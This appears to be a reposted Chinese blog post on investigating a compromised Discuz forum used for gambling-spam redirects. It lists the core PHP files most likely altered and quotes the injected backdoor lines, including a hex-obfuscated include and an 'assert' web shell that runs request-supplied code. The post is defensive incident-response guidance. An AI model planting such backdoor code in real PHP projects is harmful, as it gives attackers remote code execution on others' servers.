discuz 被入侵后,最可能被修改的文件


最近發現站點被黑了,現在還不知道是由系統漏洞導致的系統賬戶被攻陷,還是程序漏洞,文件被篡改。有一些敏感關鍵詞(例如:賭博,電子路單)被惡意指向,點擊搜索結果自動跳轉到其他站點,而且是大量的,通過搜索“site:xxx.com 賭博”,會發現一大堆。該目的是為該站點導流量,還有傳遞權重。

為了防止暴露,入侵者會把被篡改的文件時間戳保持不變,所以通過修改時間是發現不到可疑文件的

現在解決辦法只限於,查找程序源碼,一個一個文件對比最初的文件,最后發現有兩個文件最重要,如下:

  1. source/function/function_core.php
  2. uc_server/control/admin/user.php
  3. source/class/discuz/discuz_admincp.php
  4. source/class/discuz/discuz_application.php

因為這四個文件,function_core.php是是核心函數庫所有頁面都會包含;user.php是ucenter后台登陸,discuz_admincp.php是discuz管理中心用戶登錄,都可以獲得管理員賬號和密碼;discuz_application.php是整個discuz初始化的核心類文件,初始化加載。

遇到相同問題的朋友,請首先查看這幾個文件是否被修改。

 

入侵方式一:一般會在全局文件中include一個外部的文件,例如:

@include('/dev/shm/.../tmp');

@include(PACK('H*','2f746d702f2e612f636c69656e742e706870'));

 

入侵方式二:

植入代碼,可以執行外部傳入的代碼,例如:@array_map("ass\x65rt",(array)@$_REQUEST['ADMINCPS']);

ass\x65rt 其實就是 “assert”。

 

根據上面的線索,在下面的地方應該可以發現一些有惡意代碼的文件,一般是惡意搜索引擎

  • 系統的虛擬內存是否有東西,ls -a /dev/shm/ 例如:三個點的... 的隱藏文件
  • ls -a /tmp  這個也要注意

 

 

順便舉報一些黑站:

  • mujj.wang

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM